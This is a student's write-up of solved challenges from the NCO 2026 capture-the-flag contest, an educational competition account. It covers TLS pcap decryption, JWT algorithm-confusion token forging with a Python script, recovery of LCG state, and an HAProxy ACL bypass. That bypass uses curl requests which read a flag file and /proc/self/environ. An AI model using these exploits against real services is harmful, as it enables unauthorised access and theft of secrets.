Cover: Team Raffles at NCO 2026

Overview#

The National Cybersecurity Olympiad (NCO) is Singapore’s student cybersecurity pipeline, and I took part in its 2nd iteration this year. Participants have to go through qualifiers before taking part in the finals. Fortunately, I managed to land a spot to represent my school.

The finals were very chaotic and intense. During the 5 hour CTF, the competition infrastructure went down a few times, and I ended up waiting around a cumulative 1 hour even after the 30 minute extension they gave. I tried to preserve momentum throughout, but there were points in time where I could not even access the internet due to problems with routing (participants were connected to NCO infrastructure via LAN).

I managed to place 18th (out of 61 competitive plus 29 non-competitive players) and clinched a bronze medal. Though I am proud of this achievement, there are certainly improvements to be made. One more solve could have pushed me up to the silver cutoff, and I was extremely close to solving a web challenge. That being said, here are the writeups of challenges I managed to solve (and upsolve as of 5 hours after the competition).

Writeups#

Skyscraper Records - Shell#

For this challenge, I was provided a capture.pcap and SSLKEYLOGFILE. In Wireshark, we just see a bunch of encrypted traffic. To decrypt, I set Wireshark’s TLS “(Pre)-Master-Secret log filename” field to the path of the provided key log file. Then, I followed the TLS stream of a TLS packet, which shows the following:

1
[AUTH] input password >
2
robotsweepsweepsweep
3

4
[ENSIOH] >
5
show_cmds
6

7
[?] cmds:
8
show_cmds - show this message
9
show_secret - show secret
10
[?] unrecognized command!
11
[ENSIOH] >

I nc into the challenge instance and ran show_secret. Flag: NCO26{dont_y0u_l0v3_th3_1nt3rn3t_0f_th1ngs}

TryHackICO - Token#

This challenge was about exploiting JWT algorithm confusion in a node.js app.

Before exploiting anything, the backend in app.js does:

Loads public key and private key from private.pem and public.pem
Encodes and decodes JWTs with said keys
Authenticates users on /login, then stores a JWT in the auth cookie
Renders /challenges, where the flag is shown only if the admin field of a user’s JWT evaluates to true
Serves public.pem which is the public key generated at runtime.

Looking through the source code, I see that the decodeToken function accepts multiple algorithms, both asymmetric (RS256) and symmetric (HS256), while using the public key for verification.

1
const decodeToken = (token) => {
2
  try {
3
    return jwt.verify(token, PUBLIC_KEY, {
4
      algorithms: ["HS256", "RS256", "ES256", "PS256"],
5
    });
6
  } catch (e) {
7
    return null;
8
  }
9
};
10

11
const encodeToken = (payload) => {
12
  return jwt.sign(payload, PRIVATE_KEY, {
13
    algorithm: "RS256",
14
    expiresIn: "30m",
15
  });
16
};

At the same time, we mentioned earlier that the app allows us to download public.pem. To solve the challenge, we need to:

Forge a JWT with header alg: HS256
Set payload with admin: true
Sign the JWT with HMAC-SHA256 using the public key as the secret

I found a script online that does this for me here, which I then modified to solve this challenge.

1
import hmac
2
import hashlib
3
import base64
4

5
file = open('public_chal.pem')
6

7
key = file.read()
8

9
header = '{"alg":"HS256"}'
10
payload = '{"user": "c","admin": "true", "iat": 1774669491}'
11

12
encodedHeaderBytes = base64.urlsafe_b64encode(header.encode("utf-8"))
13
encodedHeader = str(encodedHeaderBytes, "utf-8").rstrip("=")
14

15
encodedPayloadBytes = base64.urlsafe_b64encode(payload.encode("utf-8"))
16
encodedPayload = str(encodedPayloadBytes, "utf-8").rstrip("=")
17

18
token = (encodedHeader + "." + encodedPayload)
19

20
sig = base64.urlsafe_b64encode(hmac.new(bytes(
21
    key, "UTF-8"), token.encode('utf-8'), hashlib.sha256).digest()).decode('UTF-8').rstrip("=")
22

23
print(token + '.' + sig)

I used BurpSuite to intercept the request and chucked the forged JWT in, and got the flag: NCO26{h0peful1y_ICO_w0nt_be_h4ck3d}

Base26 - Notes#

Given server.py:

1
import os
2
import secrets
3

4

5
def lcg(a, b, p, x):
6
    while True:
7
        x = (a * x + b) % p
8
        yield x
9

10

11
p = 2**255-19
12
x, a, b = [secrets.randbelow(p) for _ in range(3)]
13
rng = lcg(a, b, p, x)
14

15
flag = os.environ.get('FLAG', 'NCO26{test_flag}')
16
notes = [{'password': x, 'content': flag}]
17

18

19
banner = '''
20
              _                    ____   __
21
  _____ _____| |__   __ _ ___  ___|___ \ / /_  _____ _____
22
 |_____|_____| '_ \ / _` / __|/ _ \ __) | '_ \|_____|_____|
23
 |_____|_____| |_) | (_| \__ \  __// __/| (_) |_____|_____|
24
             |_.__/ \__,_|___/\___|_____|\___/
25

26
Welcome to base26 note-taking platform!'''
27

28
print(banner)
29
while True:
30
    print('''Choose your option:
31
1. Take note
32
2. Read note
33
3. Exit''')
34
    choice = int(input())
35
    match choice:
36
        case 1:
37
            content = input('Enter the note content: ')
38
            password = next(rng)
39
            notes.append({'password': password, 'content': content})
40
            print('Your note is at index', len(notes)-1)
41
            print('Your note password is:', password)
42
        case 2:
43
            idx = int(input('Enter the note index you wish to read: '))
44
            password = int(input('Enter the note password: '))
45
            if notes[idx]['password'] == password:
46
                print(notes[idx]['content'])
47
            else:
48
                print('Wrong password')
49
        case _:
50
            break
51
    print()

The service stores the real flag in note index 0, protected by an initial random password $x_0$ . Everytime we create a new note, the app prints a new password generated by:

x_{n+1} = (a x_n + b) \bmod p,\quad p = 2^{255} - 19

We can solve the challenge as such:

Create 3 notes and record three consecutive leaked passwords $x_1, x_2, x_3$ .
Recover $a$ and $b$ modulo $p$ .
Step backward to recover $x_0$ .
Read note index 0 with password $x_0$ to get the flag.

Using modular inverse:

a = (x_3 - x_2) \cdot (x_2 - x_1)^{-1} \bmod p

b = x_2 - a x_1 \bmod p

x_0 = a^{-1}(x_1 - b) \bmod p

A quick solve script:

1
p = 2**255 - 19
2
x1 = 30267209648638985813840507149356768454406709530153367390620633261401017379273
3
x2 = 53514743647770242385919762444841024048392046623152485868763613190619868527573
4
x3 = 31580233559763508480766299475777807217558236949881795704856151694982711527411
5

6
def inv(v):
7
    return pow(v % p, p-2, p)
8

9
a = ((x3 - x2) * inv(x2 - x1)) % p
10
b = (x2 - a * x1) % p
11
x0 = (inv(a) * (x1 - b)) % p
12

13
print(x0)

Leaguerant - Admin (Part 2)#

This is part 2 of a challenge that uses the same source code. Solving part 2 also allows you to get the flag for part 1 (not sure if it was intended). Unfortunately, I did not solve this during the contest, but I came really close.

Leaguerant is a stickman dueling game where players shoot at an opponent. It uses a backend built in Flask, proxied via HAProxy. The backend handles user stats and game mechanics via API calls - That’s not really important.

What stands out is the unfinished admin console at /api/console intended to provide a shell to run server commands.

1
@app.route("/api/console", methods=["GET", "POST"])
2
def console():
3
    if request.method == 'POST':
4
        cmd = request.get_json().get('command', '')
5
        args = request.get_json().get("args", [])
6
        if cmd not in ['ls', 'cat']:
7
            return jsonify({"error": "Command under construction"}), 400
8
        res = subprocess.run([cmd] + args, capture_output=True, text=True)
9
        if res.stderr:
10
            return jsonify({"error": res.stderr.strip()}), 400
11
        return jsonify({"ok": True, "result": res.stdout.strip()})
12
    return render_template('console.html')

However, access to this path is blocked in haxproxy.cfg

1
defaults
2
    mode http
3
    option forwardfor
4
    timeout client 30s
5
    timeout connect 5s
6
    timeout http-keep-alive 10s
7
    timeout http-request 30s
8
    timeout server 60s
9

10
backend web
11
    http-response add-header Via haproxy
12
    http-response add-header X-Served-By %[env(HOSTNAME)]
13
    http-reuse always
14
    server web0 ${SERVER_HOSTNAME}:${SERVER_PORT}
15

16
frontend http
17
    bind *:8080
18
    default_backend web
19
    timeout client 5s
20
    timeout http-request 10s
21

22
    # Block traffic to unfinished cheat console
23
    acl restricted_page path_beg,url_dec -i /api/console
24
    http-request deny if restricted_page

The exploit lies in how the config uses path_beg which evaluates the prefix of the path after basic URL decoding. Flask and HAProxy normalise paths differently and so by simply appending an extra leading slash, we can bypass the Access Control List. (This is because Flask resolves, for example, //api to /api). We can get the console by requesting //api/console.

During the contest, I got to this point but couldn’t run commands. Everytime I sent something with the console UI, it would return an error. I realised afterwards that this was due to how browsers interpret URIs beginning with // as protocol relative network URLs meaning it tries to contact a domain/host named api rather than maintaining the current host. This triggers a network-level fetch failure, which the code catches and outputs.

Another way to bypass the ACL could be using /%2fapi/console. However, even if I could access the console, this would not work too because of how the code was written. Let’s take a look:

1
// frontend
2
async function runAdminCmd(cmd) {
3
  if (!cmd.trim()) return;
4
  const output = document.getElementById("adminOutput");
5
  const addLine = (text, cls) => {
6
    const d = document.createElement("div");
7
    d.className = "term-line " + (cls || "");
8
    d.textContent = text;
9
    output.appendChild(d);
10
    output.scrollTop = output.scrollHeight;
11
  };
12
  addLine("$ " + cmd, "input");
13
  try {
14
    const res = await fetch("/api/admin/command", {
15
      method: "POST",
16
      headers: { "Content-Type": "application/json" },
17
      body: JSON.stringify({ command: cmd }),
18
    });
19
    const data = await res.json();
20
    if (data.ok) {
21
      data.result.split("\n").forEach((line) => {
22
        addLine("→ " + line, "success");
23
      });
24
    } else addLine("✗ " + (data.error || "Error"), "err");
25
  } catch (e) {
26
    addLine("✗ Network error", "err");
27
  }
28
}

1
# backend
2
@app.route("/api/console", methods=["GET", "POST"])
3
def console():
4
    if request.method == 'POST':
5
        cmd = request.get_json().get('command', '')
6
        args = request.get_json().get("args", [])
7
        if cmd not in ['ls', 'cat']:
8
            return jsonify({"error": "Command under construction"}), 400
9
        res = subprocess.run([cmd] + args, capture_output=True, text=True)
10
        if res.stderr:
11
            return jsonify({"error": res.stderr.strip()}), 400
12
        return jsonify({"ok": True, "result": res.stdout.strip()})
13
    return render_template('console.html')

When submitting a command, the frontend takes the cmd and sends it in the command field along with its args, instead of splitting it up into command and args. If I type say, ls -lla, the body of the request would look like {"command": "ls -lla"}. This causes the backend to block the request as it checks:

1
if cmd not in ['ls', 'cat']:
2
    return jsonify({"error": "Command under construction"}), 400

So, we can simply just use a curl command as such:

1
curl -s -X POST 'http://http://chal.nco.sg:13001//api/console' -H 'Content-Type:application/json' --data '{"command":"cat","args":["LEAGUERANT_FLAG_2.txt"]}'

Note that we can just solve part 1 of the challenge with this exploit as well. Part 1’s description mentioned that the flag was in an environment variable called flag. We could just modify the curl request and get that flag too:

1
curl -s -X POST 'http://http://chal.nco.sg:13001//api/console' -H 'Content-Type:application/json' --data '{"command":"cat","args":["/proc/self/environ"]}'

Thoughts#

All in all, NCO 2026 was a fun experience for me, besides the hiccups on the infrastructure side. For someone relatively new to cyber, I did pretty well. Being so close yet so far to solving Leaguerant was a bummer though. I’m looking forward to upcoming CTFs, and hopefully I’ll get some writeups done for them too.